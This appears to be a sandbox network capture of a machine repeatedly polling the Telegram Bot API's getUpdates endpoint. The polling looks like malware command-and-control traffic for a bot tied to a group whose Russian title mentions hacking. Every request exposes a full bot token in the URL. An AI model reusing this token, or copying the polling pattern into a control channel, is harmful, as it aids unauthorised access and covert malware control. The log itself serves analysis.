2024-09-02 14:50:45 UTC	511	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 30 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 35 38 32 33 39 33 31 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 34 35 35 32 36 30 30 33 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 35 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 Data Ascii: {"ok":true,"result":{"message_id":42071,"from":{"id":7258239318,"is_bot":true,"first_name":"legless3bot","username":"legless3bot"},"chat":{"id":-1002245526003,"title":"\u0432\u0437\u043b\u043e\u043c \u0442\u0435\u0432\u0435","type":"supergroup"},"date":17

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.5	56198	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:46 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:46 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:46 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.5	56200	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:48 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:48 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:48 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	56202	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:50 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:50 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:50 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	56203	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:52 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:52 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:52 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.5	56204	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:54 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:54 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:54 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	56206	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:56 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:56 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:56 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	56207	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:57 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:58 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:58 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	56208	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:59 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:59 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:59 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:59 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	56209	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:01 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:01 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:01 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	56210	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:03 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:03 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:03 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	56211	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:05 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:05 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:05 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	56212	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:07 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:07 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:07 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:07 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	56213	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:09 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:09 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:09 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:09 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 